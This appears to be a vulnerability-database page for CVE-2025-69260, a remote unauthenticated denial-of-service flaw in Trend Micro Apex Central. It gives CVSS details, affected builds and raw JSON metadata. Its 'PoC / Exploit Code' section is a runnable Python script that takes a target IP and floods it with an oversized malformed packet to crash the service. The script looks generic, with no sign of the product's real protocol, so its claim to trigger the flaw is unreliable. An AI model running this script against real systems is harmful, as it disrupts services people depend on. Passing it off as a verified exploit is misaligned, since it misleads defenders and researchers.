Security Vulnerability Report
中文
CVE-2025-69260 CVSS 7.5 HIGH

CVE-2025-69260

Published: 2026-01-08 13:15:43
Last Modified: 2026-01-15 19:11:14

Description

A message out-of-bounds read vulnerability in Trend Micro Apex Central could allow a remote attacker to create a denial-of-service condition on affected installations. Please note: authentication is not required in order to exploit this vulnerability.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:trendmicro:apex_central:2019:-:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:trendmicro:apex_central:2019:build_3752:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:trendmicro:apex_central:2019:build_5158:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:trendmicro:apex_central:2019:build_6016:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:trendmicro:apex_central:2019:build_6288:*:*:-:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Trend Micro Apex Central (版本< 已修复版本)
具体受影响版本请参考Trend Micro官方安全公告

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-69260 PoC - Trend Micro Apex Central Message Out-of-bounds Read This PoC demonstrates a DoS condition by sending malformed messages. Note: Use only for authorized security testing. """ import socket import struct import sys def send_malformed_message(target_ip, target_port=443): """ Send a malformed message to trigger out-of-bounds read in Apex Central. The vulnerability exists in message parsing without proper boundary checks. """ try: # Construct malformed message with oversized field # This exploits the message out-of-bounds read vulnerability header = b'\x00\x01\x00\x00' # Message header oversized_field = b'A' * 65536 # Oversized field to trigger OOB read malformed_data = header + oversized_field # Add message length prefix msg_length = len(malformed_data) packet = struct.pack('>I', msg_length) + malformed_data print(f"[*] Connecting to {target_ip}:{target_port}") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) print(f"[*] Sending malformed message ({len(packet)} bytes)") sock.sendall(packet) print("[*] Message sent. Target may be unresponsive if vulnerable.") sock.close() return True except Exception as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 443 send_malformed_message(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69260", "sourceIdentifier": "[email protected]", "published": "2026-01-08T13:15:43.153", "lastModified": "2026-01-15T19:11:14.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A message out-of-bounds read vulnerability in Trend Micro Apex Central could allow a remote attacker to create a denial-of-service condition on affected installations.\r\n\r\nPlease note: authentication is not required in order to exploit this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}, {"lang": "en", "value": "CWE-346"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:trendmicro:apex_central:2019:-:*:*:-:*:*:*", "matchCriteriaId": "664A5F5B-7494-4ADF-9028-CA5DC84AF91A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:trendmicro:apex_central:2019:build_3752:*:*:-:*:*:*", "matchCriteriaId": "316E50F7-A9DA-4B67-9ECC-C8D50116BA07"}, {"vulnerable": true, "criteria": "cpe:2.3:a:trendmicro:apex_central:2019:build_5158:*:*:-:*:*:*", "matchCriteriaId": "8FBF6D0D-D68E-4DB2-B4DE-D4157FEE54F2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:trendmicro:apex_central:2019:build_6016:*:*:-:*:*:*", "matchCriteriaId": "4B11EE47-757F-4A7D-806A-01C956535F4E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:trendmicro:apex_central:2019:build_6288:*:*:-:*:*:*", "matchCriteriaId": "FB8D4938-783C-4954-95C0-BD26162330A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:trendmicro:apex_central:2019:build_6394:*:*:-:*:*:*", "matchCriteriaId": "8FFFED78-5927-4529-B74C-BF988108EC0C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:trendmicro:apex_central:2019:build_6481:*:*:-:*:*:*", "matchCriteriaId": "D919B553-6CBD-4211-A507-CD930D485852"}, {"vulnerable": true, "criteria": "cpe:2.3:a:trendmicro:apex_central:2019:build_6511:*:*:-:*:*:*", "matchCriteriaId": "F30EC7A8-6E0D-40CE-9691-90F438F1F03B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:trendmicro:apex_central:2019:build_6571:*:*:-:*:*:*", "matchCriteriaId": "F905E86D-E3D9-4E54-B2A6-01753043A9F4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:trendmicro:apex_central:2019:build_6658:*:*:-:*:*:*", "matchCriteriaId": "231493F7-3804-4123-BE1E-ABC3AC46DAAF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:trendmicro:apex_central:2019:build_6660:*:*:-:*:*:*", "matchCriteriaId": "983C3666-DF36-4C30-BD70-669734D28475"}, {"vulnerable": true, "criteria": "cpe:2.3:a:trendmicro:apex_central:2019:build_6890:*:*:-:*:*:*", "matchCriteriaId": "2EFB9449-DB07-4F75-AB53-23F2B721C0CE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:trendmicro:apex_central:2019:build_6955:*:*:-:*:*:*", "matchCriteriaId": "8F586BF3-DD53-4243-8A9F-18D0599E9397"}, {"vulnerable": true, "criteria": "cpe:2.3:a:trendmicro:apex_central:2019:build_7007:*:*:-:*:*:*", "matchCriteriaId": "90DA4B19-8DE2-48B6-B5A7-528AD8978C00"}, {"vulnerable": true, "criteria": "cpe:2.3:a:trendmicro:apex_central:2019:build_7065:*:*:-:*:*:*", "matchCriteriaId": "F48D37D0-0FA2-4C9D-A121-C64B0F8F8D1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:trendmicro:apex_central:2019:build_7141:*:*:-:*:*:*", "matchCriteriaId": "A4AC419E-AB59-46E0-BEDF-CAD6AF84E8BB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://success.trendmicro.com/en-US/solution/KA-0022071", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://success.trendmicro.com/ja-JP/solution/KA-0022081", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.tenable.com/security/research/tra-2026-01", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}